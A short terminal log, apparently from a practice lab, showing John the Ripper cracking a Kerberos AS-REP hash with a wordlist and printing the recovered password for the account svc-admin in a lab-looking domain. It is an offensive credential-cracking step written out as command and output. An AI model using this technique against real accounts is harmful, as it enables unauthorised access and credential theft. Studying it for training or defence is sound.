john --wordlist=samples/passwordlist.txt --format=krb5asrep users_no_pre_authentication.txt

Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 ASIMD 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
management2005   ($krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL)     
1g 0:00:00:00 DONE (2022-06-22 13:00) 50.00g/s 409600p/s 409600c/s 409600C/s m123456..whitey
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
